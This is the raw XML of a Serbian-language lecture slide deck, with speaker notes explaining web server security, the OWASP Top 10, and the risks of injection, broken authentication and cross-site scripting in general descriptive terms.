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4" r:id="rId4"/>
    <p:sldId id="265" r:id="rId5"/>
    <p:sldId id="268" r:id="rId6"/>
    <p:sldId id="269" r:id="rId7"/>
    <p:sldId id="270" r:id="rId8"/>
    <p:sldId id="271" r:id="rId9"/>
    <p:sldId id="273" r:id="rId10"/>
    <p:sldId id="274" r:id="rId11"/>
    <p:sldId id="276" r:id="rId12"/>
    <p:sldId id="275" r:id="rId13"/>
    <p:sldId id="278" r:id="rId14"/>
    <p:sldId id="279" r:id="rId15"/>
    <p:sldId id="280" r:id="rId16"/>
    <p:sldId id="281" r:id="rId17"/>
    <p:sldId id="282" r:id="rId18"/>
    <p:sldId id="284" r:id="rId19"/>
    <p:sldId id="285" r:id="rId20"/>
    <p:sldId id="287" r:id="rId21"/>
    <p:sldId id="288" r:id="rId22"/>
    <p:sldId id="289" r:id="rId23"/>
    <p:sldId id="290" r:id="rId24"/>
    <p:sldId id="29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63016" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="47" d="100"/>
          <a:sy n="47" d="100"/>
        </p:scale>
        <p:origin x="162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53684-E0BE-4B50-AF80-79DEEFA506DB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55CAC-4520-4D42-8E94-EAFB0D2AE6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97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Sigurrnost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web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>serveru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cesto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>obezbedjuje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filtriranjem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saobracaja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njemu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>. U to spade </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>blokada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odredjenjih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portova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kojima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ocekuje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nebezbedni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saobracaj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Ipak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> problem je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sto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nije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uvek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potrebno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koristi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posebne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portove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napad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>vec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>moguce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izvrsiti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napad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koristenjem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>protokola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>. HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>koristi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> port 80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>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saobracaj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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> tom </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>portu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serveri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smatraju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bezbednim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54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OWASP (Open Web Application Security Project) je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>organizacija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>koja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bavi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pronalaženjem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rešavanjem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vezanih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sigurnost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>aplikacija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praktično</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>postavlja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>standarde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ovoj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>oblasti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Rezultat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>njihovog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>čuveni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dokument</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nazvan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> OWASP Top 10,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definiše</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pravila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smernice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zaštitu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> od </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>kritičnih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>propusta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> u Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>aplikacijama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OWASP Top 10 je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lista</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>najkritičnijih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sigurnosnih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rizika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>prema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mišljenju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>zajednice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Prvo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>izdanje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ovog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dokumenta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>izdato</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 2003. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>godine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Bitno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>napomenuti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> da OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>grupa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Top 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>liste</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eksplicitno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>navodi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> da to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lista</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>najčešćih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>propusta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>aplikacijama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>već</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lista</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>propusta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najvećim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rizikom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24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Napad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lak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šalje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>jednostavne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tekstualne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>napade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iskorišćavaju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sintaksu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>korisnikovog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>interpretera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Uticaj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ozbiljan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>može</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>potpuno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>preuzeti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>kontrola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> od </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>strane</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>napadača</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>svi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>podaci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mogu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>biti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ukradeni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>izmenjeni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obrisani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91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74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Napad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>srednje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>težak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koristi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>propuste</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>autentifikaciji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upravljanju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sesijama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bi se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>predstavio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neka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>druga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>osoba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Uticaj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ozbiljan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ovakav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>napad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dovesti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pristupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nekim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čak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>svim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>korisničkim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>računima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, a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računom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raspolaže</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>isto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žrtva</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>čiji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>račun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ukraden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85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XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>greške</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>događaju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> se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aplikacija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>uzme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nesigurne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>podatke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prosledi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Web browser-u bez </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ispravne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>validacije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Napad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>srednje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>težak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šalje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tekstualne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>skripte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iskorišćavaju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> interpreter u browser-u.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Uticaj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>umeren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da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ukrade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sesiju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, da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>promeni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>stranicu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>umetne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>neželjeni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sadržaj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
